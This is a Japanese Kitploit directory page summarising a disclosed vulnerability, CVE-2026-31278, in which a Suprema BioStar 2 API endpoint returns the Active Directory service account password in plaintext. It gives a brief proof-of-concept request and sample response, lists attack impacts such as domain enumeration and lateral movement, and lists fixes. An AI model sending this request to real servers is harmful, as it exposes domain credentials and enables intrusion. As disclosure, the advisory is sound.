Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-31278 — Suprema BioStar 2 における Active Directory 資格情報露出の脆弱性に関する CVE 解説 | Kitploit
ツール/GitHubGitHub/mda1r/cve-2026-31278
脆弱性スキャナーパスワード攻撃エクスプロイトウェブセキュリティネットワークセキュリティ論文と研究
GitHubmda1r/cve-2026-31278

CVE-2026-31278

Suprema BioStar 2 における Active Directory 資格情報露出の脆弱性に関する CVE 解説

リポジトリを見る
2ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-31278 Suprema BioStar 2: Active Directory 資格情報の露出


メタデータ

フィールド詳細
CVE IDCVE-2026-31278
ベンダーSuprema Inc.
製品BioStar 2
脆弱性タイプ機密情報の開示 / 資格情報の露出
攻撃ベクトルリモート / 認証済み / 低複雑性
深刻度高
修正バージョンBioStar 2 v2.9.12 / BioStarX v1.0.2
研究者Abdullah Alannaz

概要

Suprema BioStar 2 には、Active Directory 統合設定の不適切な処理に起因する機密情報の開示の脆弱性が存在します。バックエンド API エンドポイント /api/v2/setting/adserversetting は、管理 UI でパスワードがマスクされているにもかかわらず、Active Directory バインドアカウントの資格情報を平文で返します。


影響を受けるバージョン

  • BioStar 2 Core / AC v2.9.5.29
  • BioStar 2 T&A v2.9.5.3

技術的詳細

管理インターフェースではパスワードフィールドがマスクされていますが、バックエンド API への認証済みリクエストにより、無効化された SSL 通信を含む LDAP 設定パラメータとともに、完全な暗号化されていないパスワードが開示されます。

認証済みの攻撃者は、AD サーバー設定エンドポイントに HTTP GET リクエストを送信し、サーバーレスポンス内で Active Directory サービスアカウントのパスワードを平文で取得します。

概念実証(PoC)

リクエスト:

root@kitploit:~
GET /api/v2/setting/adserversetting HTTP/1.1
Host: <target>
Authorization: Bearer <token>

レスポンス:

root@kitploit:~
{
  "ad_server": "ldap://internal.domain.local",
  "bind_dn": "CN=svc_biostar,DC=domain,DC=local",
  "password": "<plaintext_password_returned_here>",
  "ssl_enabled": false
}

影響

認証済みの攻撃者は、開示された資格情報を利用して以下のことが可能になる可能性があります:

  • Active Directory に対する LDAP 認証を実行する
  • ドメインユーザー、グループ、組織単位を列挙する
  • 内部ネットワークの偵察を実施する
  • ドメイン接続されたシステム間で横展開(ラテラルムーブメント)を実行する
  • サービスアカウントの権限によっては特権を昇格させる可能性がある

タイムライン

CVE-2026-31278 は MITRE によって割り当てられました | 修正版 BioStar 2 v2.9.12 / BioStarX v1.0.2 がリリースされました |


修復策

  • BioStar 2 v2.9.12 または BioStarX v1.0.2 に更新する
  • すべての Active Directory サービスアカウントの資格情報を直ちにローテーションする
  • API アクセスを信頼できるネットワークセグメントのみに制限する
  • Active Directory 通信に LDAPS (SSL) を有効にする

参照

  • Suprema Inc.: https://www.supremainc.com

クレジット

Abdullah Alannaz セキュリティリサーチャー

この脆弱性は Suprema に責任を持って開示されました。ベンダーは問題を確認し、CVE 割り当てについて MITRE と調整しました。

ツールをダウンロード